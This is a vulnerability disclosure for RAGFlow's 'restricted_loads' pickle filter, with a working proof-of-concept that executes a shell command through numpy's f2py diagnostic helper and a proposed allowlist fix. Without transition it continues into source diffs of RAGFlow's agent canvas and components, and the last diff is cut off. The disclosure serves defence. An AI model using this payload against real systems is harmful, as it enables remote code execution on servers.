## Supported Versions

The following versions of the project are currently supported with security updates.

| Version | Supported          |
| ------- | ------------------ |
| <=0.7.0 | :white_check_mark: |

## Reporting a Vulnerability

### Branch name

main

### Actual behavior

The `restricted_loads` function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable and can lead to arbitrary code execution.
The main reason is that the `numpy` module exposes `numpy.f2py.diagnose.run_command`, which executes commands directly, while `restricted_loads` allows users to import any function from the `numpy` module.

### Steps to reproduce

**ragflow_patch.py**

```py
import builtins
import io
import pickle

safe_module = {
    'numpy',
    'rag_flow'
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        import importlib
        if module.split('.')[0] in safe_module:
            _module = importlib.import_module(module)
            return getattr(_module, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


def restricted_loads(src):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(src)).load()
```

Then, **PoC.py**

```py
import pickle
from ragflow_patch import restricted_loads


class Exploit:
    def __reduce__(self):
        import numpy.f2py.diagnose
        return numpy.f2py.diagnose.run_command, ('whoami', )


payload = pickle.dumps(Exploit())
restricted_loads(payload)
```

**Result**



### Additional information

#### How to prevent?

Strictly filter the module and name before calling `getattr`, as sketched below.
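A minimal sketch of one possible fix, assuming the set of globals that legitimately travel through `restricted_loads` is known in advance. The allowlist entries below are illustrative, not RAGFlow's actual list:

```python
import io
import pickle

# Hypothetical allowlist: exact (module, name) pairs instead of module prefixes,
# so attribute lookups such as numpy.f2py.diagnose.run_command can never match.
SAFE_GLOBALS = {
    ("numpy", "dtype"),
    ("numpy", "ndarray"),
    ("numpy.core.multiarray", "_reconstruct"),
}


class StrictUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            import importlib
            return getattr(importlib.import_module(module), name)
        # Everything not explicitly listed is rejected.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def strict_loads(src: bytes):
    """Like pickle.loads(), but only allowlisted globals can be resolved."""
    return StrictUnpickler(io.BytesIO(src)).load()
```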
@@ -1,21 +1,18 @@
 #
-#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
+#  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 
-import operator
-import time
-import typing
-from api.utils.log_utils import sql_logger
-import peewee
+from beartype.claw import beartype_this_package
+beartype_this_package()
538	agent/canvas.py	Normal file

@@ -0,0 +1,538 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import base64
import json
import logging
import time
from concurrent.futures import ThreadPoolExecutor
from copy import deepcopy
from functools import partial
from typing import Any, Union, Tuple

from agent.component import component_class
from agent.component.base import ComponentBase
from api.db.services.file_service import FileService
from api.utils import get_uuid, hash_str2int
from rag.prompts.prompts import chunks_format
from rag.utils.redis_conn import REDIS_CONN


class Canvas:
    """
    dsl = {
        "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {},
                },
                "downstream": ["answer_0"],
                "upstream": [],
            },
            "retrieval_0": {
                "obj": {
                    "component_name": "Retrieval",
                    "params": {}
                },
                "downstream": ["generate_0"],
                "upstream": ["answer_0"],
            },
            "generate_0": {
                "obj": {
                    "component_name": "Generate",
                    "params": {}
                },
                "downstream": ["answer_0"],
                "upstream": ["retrieval_0"],
            }
        },
        "history": [],
        "path": ["begin"],
        "retrieval": {"chunks": [], "doc_aggs": []},
        "globals": {
            "sys.query": "",
            "sys.user_id": tenant_id,
            "sys.conversation_turns": 0,
            "sys.files": []
        }
    }
    """

    def __init__(self, dsl: str, tenant_id=None, task_id=None):
        self.path = []
        self.history = []
        self.components = {}
        self.error = ""
        self.globals = {
            "sys.query": "",
            "sys.user_id": tenant_id,
            "sys.conversation_turns": 0,
            "sys.files": []
        }
        self.dsl = json.loads(dsl) if dsl else {
            "components": {
                "begin": {
                    "obj": {
                        "component_name": "Begin",
                        "params": {
                            "prologue": "Hi there!"
                        }
                    },
                    "downstream": [],
                    "upstream": [],
                    "parent_id": ""
                }
            },
            "history": [],
            "path": [],
            "retrieval": [],
            "globals": {
                "sys.query": "",
                "sys.user_id": "",
                "sys.conversation_turns": 0,
                "sys.files": []
            }
        }
        self._tenant_id = tenant_id
        self.task_id = task_id if task_id else get_uuid()
        self.load()

    def load(self):
        # Instantiate every component declared in the DSL and validate its parameters.
        self.components = self.dsl["components"]
        cpn_nms = set([])
        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])

        assert "Begin" in cpn_nms, "There must be a 'Begin' component."

        for k, cpn in self.components.items():
            param = component_class(cpn["obj"]["component_name"] + "Param")()
            param.update(cpn["obj"]["params"])
            try:
                param.check()
            except Exception as e:
                raise ValueError(self.get_component_name(k) + f": {e}")

            cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)

        self.path = self.dsl["path"]
        self.history = self.dsl["history"]
        self.globals = self.dsl["globals"]
        self.retrieval = self.dsl["retrieval"]
        self.memory = self.dsl.get("memory", [])

    def __str__(self):
        # Serialize the canvas back into its JSON DSL representation.
        self.dsl["path"] = self.path
        self.dsl["history"] = self.history
        self.dsl["globals"] = self.globals
        self.dsl["task_id"] = self.task_id
        self.dsl["retrieval"] = self.retrieval
        self.dsl["memory"] = self.memory
        dsl = {
            "components": {}
        }
        for k in self.dsl.keys():
            if k in ["components"]:
                continue
            dsl[k] = deepcopy(self.dsl[k])

        for k, cpn in self.components.items():
            if k not in dsl["components"]:
                dsl["components"][k] = {}
            for c in cpn.keys():
                if c == "obj":
                    dsl["components"][k][c] = json.loads(str(cpn["obj"]))
                    continue
                dsl["components"][k][c] = deepcopy(cpn[c])
        return json.dumps(dsl, ensure_ascii=False)

    def reset(self, mem=False):
        self.path = []
        if not mem:
            self.history = []
        self.retrieval = []
        self.memory = []
        for k, cpn in self.components.items():
            self.components[k]["obj"].reset()

        # Reset every global to the zero value of its type.
        for k in self.globals.keys():
            if isinstance(self.globals[k], str):
                self.globals[k] = ""
            elif isinstance(self.globals[k], int):
                self.globals[k] = 0
            elif isinstance(self.globals[k], float):
                self.globals[k] = 0.
            elif isinstance(self.globals[k], list):
                self.globals[k] = []
            elif isinstance(self.globals[k], dict):
                self.globals[k] = {}
            else:
                self.globals[k] = None

        try:
            REDIS_CONN.delete(f"{self.task_id}-logs")
        except Exception as e:
            logging.exception(e)

    def get_component_name(self, cid):
        for n in self.dsl.get("graph", {}).get("nodes", []):
            if cid == n["id"]:
                return n["data"]["name"]
        return ""

    def run(self, **kwargs):
        st = time.perf_counter()
        self.message_id = get_uuid()
        created_at = int(time.time())
        self.add_user_input(kwargs.get("query"))

        for k in kwargs.keys():
            if k in ["query", "user_id", "files"] and kwargs[k]:
                if k == "files":
                    self.globals[f"sys.{k}"] = self.get_files(kwargs[k])
                else:
                    self.globals[f"sys.{k}"] = kwargs[k]
        if not self.globals["sys.conversation_turns"]:
            self.globals["sys.conversation_turns"] = 0
        self.globals["sys.conversation_turns"] += 1

        def decorate(event, dt):
            nonlocal created_at
            return {
                "event": event,
                # "conversation_id": "f3cc152b-24b0-4258-a1a1-7d5e9fc8a115",
                "message_id": self.message_id,
                "created_at": created_at,
                "task_id": self.task_id,
                "data": dt
            }

        if not self.path or self.path[-1].lower().find("userfillup") < 0:
            self.path.append("begin")
            self.retrieval.append({"chunks": [], "doc_aggs": []})

        yield decorate("workflow_started", {"inputs": kwargs.get("inputs")})
        self.retrieval.append({"chunks": {}, "doc_aggs": {}})

        def _run_batch(f, t):
            # Invoke the components at path[f:t] concurrently.
            with ThreadPoolExecutor(max_workers=5) as executor:
                thr = []
                for i in range(f, t):
                    cpn = self.get_component_obj(self.path[i])
                    if cpn.component_name.lower() in ["begin", "userfillup"]:
                        thr.append(executor.submit(cpn.invoke, inputs=kwargs.get("inputs", {})))
                    else:
                        thr.append(executor.submit(cpn.invoke, **cpn.get_input()))
                for th in thr:
                    th.result()

        def _node_finished(cpn_obj):
            return decorate("node_finished", {
                "inputs": cpn_obj.get_input_values(),
                "outputs": cpn_obj.output(),
                "component_id": cpn_obj._id,
                "component_name": self.get_component_name(cpn_obj._id),
                "component_type": self.get_component_type(cpn_obj._id),
                "error": cpn_obj.error(),
                "elapsed_time": time.perf_counter() - cpn_obj.output("_created_time"),
                "created_at": cpn_obj.output("_created_time"),
            })

        self.error = ""
        idx = len(self.path) - 1
        partials = []
        while idx < len(self.path):
            to = len(self.path)
            for i in range(idx, to):
                yield decorate("node_started", {
                    "inputs": None, "created_at": int(time.time()),
                    "component_id": self.path[i],
                    "component_name": self.get_component_name(self.path[i]),
                    "component_type": self.get_component_type(self.path[i]),
                    "thoughts": self.get_component_thoughts(self.path[i])
                })
            _run_batch(idx, to)

            # Post-processing of component invocations.
            for i in range(idx, to):
                cpn = self.get_component(self.path[i])
                cpn_obj = self.get_component_obj(self.path[i])
                if cpn_obj.component_name.lower() == "message":
                    # Stream partial outputs token by token; otherwise emit in one shot.
                    if isinstance(cpn_obj.output("content"), partial):
                        _m = ""
                        for m in cpn_obj.output("content")():
                            if not m:
                                continue
                            if m == "<think>":
                                yield decorate("message", {"content": "", "start_to_think": True})
                            elif m == "</think>":
                                yield decorate("message", {"content": "", "end_to_think": True})
                            else:
                                yield decorate("message", {"content": m})
                            _m += m
                        cpn_obj.set_output("content", _m)
                    else:
                        yield decorate("message", {"content": cpn_obj.output("content")})
                    yield decorate("message_end", {"reference": self.get_reference()})

                while partials:
                    _cpn_obj = self.get_component_obj(partials[0])
                    if isinstance(_cpn_obj.output("content"), partial):
                        break
                    yield _node_finished(_cpn_obj)
                    partials.pop(0)

                other_branch = False
                if cpn_obj.error():
                    ex = cpn_obj.exception_handler()
                    if ex and ex["goto"]:
                        self.path.extend(ex["goto"])
                        other_branch = True
                    elif ex and ex["default_value"]:
                        yield decorate("message", {"content": ex["default_value"]})
                        yield decorate("message_end", {})
                    else:
                        self.error = cpn_obj.error()

                if cpn_obj.component_name.lower() != "iteration":
                    if isinstance(cpn_obj.output("content"), partial):
                        if self.error:
                            cpn_obj.set_output("content", None)
                            yield _node_finished(cpn_obj)
                        else:
                            partials.append(self.path[i])
                    else:
                        yield _node_finished(cpn_obj)

                def _append_path(cpn_id):
                    nonlocal other_branch
                    if other_branch:
                        return
                    if self.path[-1] == cpn_id:
                        return
                    self.path.append(cpn_id)

                def _extend_path(cpn_ids):
                    nonlocal other_branch
                    if other_branch:
                        return
                    for cpn_id in cpn_ids:
                        _append_path(cpn_id)

                # Schedule the next components according to the component type.
                if cpn_obj.component_name.lower() == "iterationitem" and cpn_obj.end():
                    iter = cpn_obj.get_parent()
                    yield _node_finished(iter)
                    _extend_path(self.get_component(cpn["parent_id"])["downstream"])
                elif cpn_obj.component_name.lower() in ["categorize", "switch"]:
                    _extend_path(cpn_obj.output("_next"))
                elif cpn_obj.component_name.lower() == "iteration":
                    _append_path(cpn_obj.get_start())
                elif not cpn["downstream"] and cpn_obj.get_parent():
                    _append_path(cpn_obj.get_parent().get_start())
                else:
                    _extend_path(cpn["downstream"])

            if self.error:
                logging.error(f"Runtime Error: {self.error}")
                break
            idx = to

        if any([self.get_component_obj(c).component_name.lower() == "userfillup" for c in self.path[idx:]]):
            path = [c for c in self.path[idx:] if self.get_component(c)["obj"].component_name.lower() == "userfillup"]
            path.extend([c for c in self.path[idx:] if self.get_component(c)["obj"].component_name.lower() != "userfillup"])
            another_inputs = {}
            tips = ""
            for c in path:
                o = self.get_component_obj(c)
                if o.component_name.lower() == "userfillup":
                    another_inputs.update(o.get_input_elements())
                    if o.get_param("enable_tips"):
                        tips = o.get_param("tips")
            self.path = path
            yield decorate("user_inputs", {"inputs": another_inputs, "tips": tips})
            return

        self.path = self.path[:idx]
        if not self.error:
            yield decorate("workflow_finished",
                           {
                               "inputs": kwargs.get("inputs"),
                               "outputs": self.get_component_obj(self.path[-1]).output(),
                               "elapsed_time": time.perf_counter() - st,
                               "created_at": st,
                           })
            self.history.append(("assistant", self.get_component_obj(self.path[-1]).output()))

    def get_component(self, cpn_id) -> Union[None, dict[str, Any]]:
        return self.components.get(cpn_id)

    def get_component_obj(self, cpn_id) -> ComponentBase:
        return self.components.get(cpn_id)["obj"]

    def get_component_type(self, cpn_id) -> str:
        return self.components.get(cpn_id)["obj"].component_name

    def get_component_input_form(self, cpn_id) -> dict:
        return self.components.get(cpn_id)["obj"].get_input_form()

    def is_reff(self, exp: str) -> bool:
        exp = exp.strip("{").strip("}")
        if exp.find("@") < 0:
            return exp in self.globals
        arr = exp.split("@")
        if len(arr) != 2:
            return False
        if self.get_component(arr[0]) is None:
            return False
        return True

    def get_variable_value(self, exp: str) -> Any:
        exp = exp.strip("{").strip("}").strip(" ").strip("{").strip("}")
        if exp.find("@") < 0:
            return self.globals[exp]
        cpn_id, var_nm = exp.split("@")
        cpn = self.get_component(cpn_id)
        if not cpn:
            raise Exception(f"Can't find variable: '{cpn_id}@{var_nm}'")
        return cpn["obj"].output(var_nm)

    def get_tenant_id(self):
        return self._tenant_id

    def get_history(self, window_size):
        convs = []
        if window_size <= 0:
            return convs
        for role, obj in self.history[window_size * -1:]:
            if isinstance(obj, dict):
                convs.append({"role": role, "content": obj.get("content", "")})
            else:
                convs.append({"role": role, "content": str(obj)})
        return convs

    def add_user_input(self, question):
        self.history.append(("user", question))

    def _find_loop(self, max_loops=6):
        # Detect a repeating sub-sequence of component ids at the tail of the execution path.
        path = self.path[::-1]
        if len(path) < 2:
            return False

        for i in range(len(path)):
            if path[i].lower().find("answer") == 0 or path[i].lower().find("iterationitem") == 0:
                path = path[:i]
                break

        if len(path) < 2:
            return False

        for loc in range(2, len(path) // 2):
            pat = ",".join(path[0:loc])
            path_str = ",".join(path)
            if len(pat) >= len(path_str):
                return False
            loop = max_loops
            while path_str.find(pat) == 0 and loop >= 0:
                loop -= 1
                if len(pat) + 1 >= len(path_str):
                    return False
                path_str = path_str[len(pat) + 1:]
            if loop < 0:
                pat = " => ".join([p.split(":")[0] for p in path[0:loc]])
                return pat + " => " + pat

        return False

    def get_prologue(self):
        return self.components["begin"]["obj"]._param.prologue

    def set_global_param(self, **kwargs):
        self.globals.update(kwargs)

    def get_preset_param(self):
        return self.components["begin"]["obj"]._param.inputs

    def get_component_input_elements(self, cpnnm):
        return self.components[cpnnm]["obj"].get_input_elements()

    def get_files(self, files: Union[None, list[dict]]) -> list[str]:
        if not files:
            return []

        def image_to_base64(file):
            return "data:{};base64,{}".format(
                file["mime_type"],
                base64.b64encode(FileService.get_blob(file["created_by"], file["id"])).decode("utf-8"))

        # Convert images to data URIs and parse other files, all in parallel.
        exe = ThreadPoolExecutor(max_workers=5)
        threads = []
        for file in files:
            if file["mime_type"].find("image") >= 0:
                threads.append(exe.submit(image_to_base64, file))
                continue
            threads.append(exe.submit(FileService.parse, file["name"], FileService.get_blob(file["created_by"], file["id"]), True, file["created_by"]))
        return [th.result() for th in threads]

    def tool_use_callback(self, agent_id: str, func_name: str, params: dict, result: Any):
        # Append a tool-call trace entry to this task's log in Redis.
        agent_ids = agent_id.split("-->")
        agent_name = self.get_component_name(agent_ids[0])
        path = agent_name if len(agent_ids) < 2 else agent_name + "-->" + "-->".join(agent_ids[1:])
        try:
            bin = REDIS_CONN.get(f"{self.task_id}-{self.message_id}-logs")
            if bin:
                obj = json.loads(bin.encode("utf-8"))
                if obj[-1]["component_id"] == agent_ids[0]:
                    obj[-1]["trace"].append({"path": path, "tool_name": func_name, "arguments": params, "result": result})
                else:
                    obj.append({
                        "component_id": agent_ids[0],
                        "trace": [{"path": path, "tool_name": func_name, "arguments": params, "result": result}]
                    })
            else:
                obj = [{
                    "component_id": agent_ids[0],
                    "trace": [{"path": path, "tool_name": func_name, "arguments": params, "result": result}]
                }]
            REDIS_CONN.set_obj(f"{self.task_id}-{self.message_id}-logs", obj, 60 * 10)
        except Exception as e:
            logging.exception(e)

    def add_refernce(self, chunks: list[object], doc_infos: list[object]):
        if not self.retrieval:
            self.retrieval = [{"chunks": {}, "doc_aggs": {}}]

        r = self.retrieval[-1]
        for ck in chunks_format({"chunks": chunks}):
            cid = hash_str2int(ck["id"], 100)
            if cid not in r["chunks"]:
                r["chunks"][cid] = ck

        for doc in doc_infos:
            if doc["doc_name"] not in r["doc_aggs"]:
                r["doc_aggs"][doc["doc_name"]] = doc

    def get_reference(self):
        if not self.retrieval:
            return {"chunks": {}, "doc_aggs": {}}
        return self.retrieval[-1]

    def add_memory(self, user: str, assist: str, summ: str):
        self.memory.append((user, assist, summ))

    def get_memory(self) -> list[Tuple]:
        return self.memory

    def get_component_thoughts(self, cpn_id) -> str:
        return self.components.get(cpn_id)["obj"].thoughts()
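A minimal sketch of how a caller might drive this event loop. The DSL file path, tenant id, and query are placeholders, not values from the repository:

```python
# Hypothetical driver for Canvas.run(); dsl_json and tenant id are illustrative.
from agent.canvas import Canvas

dsl_json = open("flow_dsl.json").read()  # a DSL string shaped like the Canvas docstring above
canvas = Canvas(dsl_json, tenant_id="tenant-0")
for event in canvas.run(query="What is RAGFlow?", inputs={}):
    # Each event is a dict built by decorate(): event name, message_id, task_id, data.
    if event["event"] == "message":
        print(event["data"]["content"], end="")
    elif event["event"] == "workflow_finished":
        print("\nfinished in", event["data"]["elapsed_time"], "seconds")
```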
57	agent/component/__init__.py	Normal file

@@ -0,0 +1,57 @@
#
#  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#

import os
import importlib
import inspect
from types import ModuleType
from typing import Dict, Type

_package_path = os.path.dirname(__file__)
__all_classes: Dict[str, Type] = {}


def _import_submodules() -> None:
    # Import every component module in this package (skipping __init__ and base).
    for filename in os.listdir(_package_path):  # noqa: F821
        if filename.startswith("__") or not filename.endswith(".py") or filename.startswith("base"):
            continue
        module_name = filename[:-3]

        try:
            module = importlib.import_module(f".{module_name}", package=__name__)
            _extract_classes_from_module(module)  # noqa: F821
        except ImportError as e:
            print(f"Warning: Failed to import module {module_name}: {str(e)}")


def _extract_classes_from_module(module: ModuleType) -> None:
    # Re-export every public class defined in the module at package level.
    for name, obj in inspect.getmembers(module):
        if (inspect.isclass(obj) and
                obj.__module__ == module.__name__ and not name.startswith("_")):
            __all_classes[name] = obj
            globals()[name] = obj


_import_submodules()

__all__ = list(__all_classes.keys()) + ["__all_classes"]

del _package_path, _import_submodules, _extract_classes_from_module


def component_class(class_name):
    # Resolve a component class by name, falling back to the agent.tools package.
    m = importlib.import_module("agent.component")
    try:
        return getattr(m, class_name)
    except Exception:
        return getattr(importlib.import_module("agent.tools"), class_name)
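A short sketch of how `component_class` is used when a canvas instantiates its DSL, mirroring `Canvas.load()` above. The component name and parameter value are illustrative only:

```python
from agent.component import component_class

# "Retrieval" is an example component name; any class registered by this package works.
param = component_class("RetrievalParam")()  # parameter class, resolved by name
param.update({"similarity_threshold": 0.2})  # hypothetical parameter values from the DSL
param.check()                                # raises if the configuration is invalid
cpn = component_class("Retrieval")(canvas, "retrieval_0", param)  # canvas: a Canvas instance
```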
344
agent/component/agent_with_tools.py
Normal file
344
agent/component/agent_with_tools.py
Normal file
@ -0,0 +1,344 @@
|
|||||||
|
#
|
||||||
|
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||||
|
#
|
||||||
|
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
# you may not use this file except in compliance with the License.
|
||||||
|
# You may obtain a copy of the License at
|
||||||
|
#
|
||||||
|
# http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
#
|
||||||
|
# Unless required by applicable law or agreed to in writing, software
|
||||||
|
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
# See the License for the specific language governing permissions and
|
||||||
|
# limitations under the License.
|
||||||
|
#
|
||||||
|
import logging
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
from concurrent.futures import ThreadPoolExecutor
|
||||||
|
from copy import deepcopy
|
||||||
|
from functools import partial
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
import json_repair
|
||||||
|
|
||||||
|
from agent.tools.base import LLMToolPluginCallSession, ToolParamBase, ToolBase, ToolMeta
|
||||||
|
from api.db.services.llm_service import LLMBundle, TenantLLMService
|
||||||
|
from api.db.services.mcp_server_service import MCPServerService
|
||||||
|
from api.utils.api_utils import timeout
|
||||||
|
from rag.prompts import message_fit_in
|
||||||
|
from rag.prompts.prompts import next_step, COMPLETE_TASK, analyze_task, \
|
||||||
|
citation_prompt, reflect, rank_memories, kb_prompt, citation_plus, full_question
|
||||||
|
from rag.utils.mcp_tool_call_conn import MCPToolCallSession, mcp_tool_metadata_to_openai_tool
|
||||||
|
from agent.component.llm import LLMParam, LLM
|
||||||
|
|
||||||
|
|
||||||
|
class AgentParam(LLMParam, ToolParamBase):
|
||||||
|
"""
|
||||||
|
Define the Agent component parameters.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self.meta:ToolMeta = {
|
||||||
|
"name": "agent",
|
||||||
|
"description": "This is an agent for a specific task.",
|
||||||
|
"parameters": {
|
||||||
|
"user_prompt": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "This is the order you need to send to the agent.",
|
||||||
|
"default": "",
|
||||||
|
"required": True
|
||||||
|
},
|
||||||
|
"reasoning": {
|
||||||
|
"type": "string",
|
||||||
|
"description": (
|
||||||
|
"Supervisor's reasoning for choosing the this agent. "
|
||||||
|
"Explain why this agent is being invoked and what is expected of it."
|
||||||
|
),
|
||||||
|
"required": True
|
||||||
|
},
|
||||||
|
"context": {
|
||||||
|
"type": "string",
|
||||||
|
"description": (
|
||||||
|
"All relevant background information, prior facts, decisions, "
|
||||||
|
"and state needed by the agent to solve the current query. "
|
||||||
|
"Should be as detailed and self-contained as possible."
|
||||||
|
),
|
||||||
|
"required": True
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
super().__init__()
|
||||||
|
self.function_name = "agent"
|
||||||
|
self.tools = []
|
||||||
|
self.mcp = []
|
||||||
|
self.max_rounds = 5
|
||||||
|
self.description = ""
|
||||||
|
|
||||||
|
|
||||||
|
class Agent(LLM, ToolBase):
|
||||||
|
component_name = "Agent"
|
||||||
|
|
||||||
|
def __init__(self, canvas, id, param: LLMParam):
|
||||||
|
LLM.__init__(self, canvas, id, param)
|
||||||
|
self.tools = {}
|
||||||
|
for cpn in self._param.tools:
|
||||||
|
cpn = self._load_tool_obj(cpn)
|
||||||
|
self.tools[cpn.get_meta()["function"]["name"]] = cpn
|
||||||
|
|
||||||
|
self.chat_mdl = LLMBundle(self._canvas.get_tenant_id(), TenantLLMService.llm_id2llm_type(self._param.llm_id), self._param.llm_id,
|
||||||
|
max_retries=self._param.max_retries,
|
||||||
|
retry_interval=self._param.delay_after_error,
|
||||||
|
max_rounds=self._param.max_rounds,
|
||||||
|
verbose_tool_use=True
|
||||||
|
)
|
||||||
|
self.tool_meta = [v.get_meta() for _,v in self.tools.items()]
|
||||||
|
|
||||||
|
for mcp in self._param.mcp:
|
||||||
|
_, mcp_server = MCPServerService.get_by_id(mcp["mcp_id"])
|
||||||
|
tool_call_session = MCPToolCallSession(mcp_server, mcp_server.variables)
|
||||||
|
for tnm, meta in mcp["tools"].items():
|
||||||
|
self.tool_meta.append(mcp_tool_metadata_to_openai_tool(meta))
|
||||||
|
self.tools[tnm] = tool_call_session
|
||||||
|
self.callback = partial(self._canvas.tool_use_callback, id)
|
||||||
|
self.toolcall_session = LLMToolPluginCallSession(self.tools, self.callback)
|
||||||
|
#self.chat_mdl.bind_tools(self.toolcall_session, self.tool_metas)
|
||||||
|
|
||||||
|
def _load_tool_obj(self, cpn: dict) -> object:
|
||||||
|
from agent.component import component_class
|
||||||
|
param = component_class(cpn["component_name"] + "Param")()
|
||||||
|
param.update(cpn["params"])
|
||||||
|
try:
|
||||||
|
param.check()
|
||||||
|
except Exception as e:
|
||||||
|
self.set_output("_ERROR", cpn["component_name"] + f" configuration error: {e}")
|
||||||
|
raise
|
||||||
|
cpn_id = f"{self._id}-->" + cpn.get("name", "").replace(" ", "_")
|
||||||
|
return component_class(cpn["component_name"])(self._canvas, cpn_id, param)
|
||||||
|
|
||||||
|
def get_meta(self) -> dict[str, Any]:
|
||||||
|
self._param.function_name= self._id.split("-->")[-1]
|
||||||
|
m = super().get_meta()
|
||||||
|
if hasattr(self._param, "user_prompt") and self._param.user_prompt:
|
||||||
|
m["function"]["parameters"]["properties"]["user_prompt"] = self._param.user_prompt
|
||||||
|
return m
|
||||||
|
|
||||||
|
def get_input_form(self) -> dict[str, dict]:
|
||||||
|
res = {}
|
||||||
|
for k, v in self.get_input_elements().items():
|
||||||
|
res[k] = {
|
||||||
|
"type": "line",
|
||||||
|
"name": v["name"]
|
||||||
|
}
|
||||||
|
for cpn in self._param.tools:
|
||||||
|
if not isinstance(cpn, LLM):
|
||||||
|
continue
|
||||||
|
res.update(cpn.get_input_form())
|
||||||
|
return res
|
||||||
|
|
||||||
|
@timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 20*60))
|
||||||
|
def _invoke(self, **kwargs):
|
||||||
|
if kwargs.get("user_prompt"):
|
||||||
|
usr_pmt = ""
|
||||||
|
if kwargs.get("reasoning"):
|
||||||
|
usr_pmt += "\nREASONING:\n{}\n".format(kwargs["reasoning"])
|
||||||
|
if kwargs.get("context"):
|
||||||
|
usr_pmt += "\nCONTEXT:\n{}\n".format(kwargs["context"])
|
||||||
|
if usr_pmt:
|
||||||
|
usr_pmt += "\nQUERY:\n{}\n".format(str(kwargs["user_prompt"]))
|
||||||
|
else:
|
||||||
|
usr_pmt = str(kwargs["user_prompt"])
|
||||||
|
self._param.prompts = [{"role": "user", "content": usr_pmt}]
|
||||||
|
|
||||||
|
if not self.tools:
|
||||||
|
return LLM._invoke(self, **kwargs)
|
||||||
|
|
||||||
|
prompt, msg = self._prepare_prompt_variables()
|
||||||
|
|
||||||
|
downstreams = self._canvas.get_component(self._id)["downstream"] if self._canvas.get_component(self._id) else []
|
||||||
|
ex = self.exception_handler()
|
||||||
|
if any([self._canvas.get_component_obj(cid).component_name.lower()=="message" for cid in downstreams]) and not self._param.output_structure and not (ex and ex["goto"]):
|
||||||
|
self.set_output("content", partial(self.stream_output_with_tools, prompt, msg))
|
||||||
|
return
|
||||||
|
|
||||||
|
_, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
|
||||||
|
use_tools = []
|
||||||
|
ans = ""
|
||||||
|
for delta_ans, tk in self._react_with_tools_streamly(msg, use_tools):
|
||||||
|
ans += delta_ans
|
||||||
|
|
||||||
|
if ans.find("**ERROR**") >= 0:
|
||||||
|
logging.error(f"Agent._chat got error. response: {ans}")
|
||||||
|
if self.get_exception_default_value():
|
||||||
|
self.set_output("content", self.get_exception_default_value())
|
||||||
|
else:
|
||||||
|
self.set_output("_ERROR", ans)
|
||||||
|
return
|
||||||
|
|
||||||
|
self.set_output("content", ans)
|
||||||
|
if use_tools:
|
||||||
|
self.set_output("use_tools", use_tools)
|
||||||
|
return ans
|
||||||
|
|
||||||
|
def stream_output_with_tools(self, prompt, msg):
|
||||||
|
_, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
|
||||||
|
answer_without_toolcall = ""
|
||||||
|
use_tools = []
|
||||||
|
for delta_ans,_ in self._react_with_tools_streamly(msg, use_tools):
|
||||||
|
if delta_ans.find("**ERROR**") >= 0:
|
||||||
|
if self.get_exception_default_value():
|
||||||
|
self.set_output("content", self.get_exception_default_value())
|
||||||
|
yield self.get_exception_default_value()
|
||||||
|
else:
|
||||||
|
self.set_output("_ERROR", delta_ans)
|
||||||
|
answer_without_toolcall += delta_ans
|
||||||
|
yield delta_ans
|
||||||
|
|
||||||
|
self.set_output("content", answer_without_toolcall)
|
||||||
|
if use_tools:
|
||||||
|
self.set_output("use_tools", use_tools)
|
||||||
|
|
||||||
|
def _gen_citations(self, text):
|
||||||
|
retrievals = self._canvas.get_reference()
|
||||||
|
retrievals = {"chunks": list(retrievals["chunks"].values()), "doc_aggs": list(retrievals["doc_aggs"].values())}
|
||||||
|
formated_refer = kb_prompt(retrievals, self.chat_mdl.max_length, True)
|
||||||
|
for delta_ans in self._generate_streamly([{"role": "system", "content": citation_plus("\n\n".join(formated_refer))},
|
||||||
|
{"role": "user", "content": text}
|
||||||
|
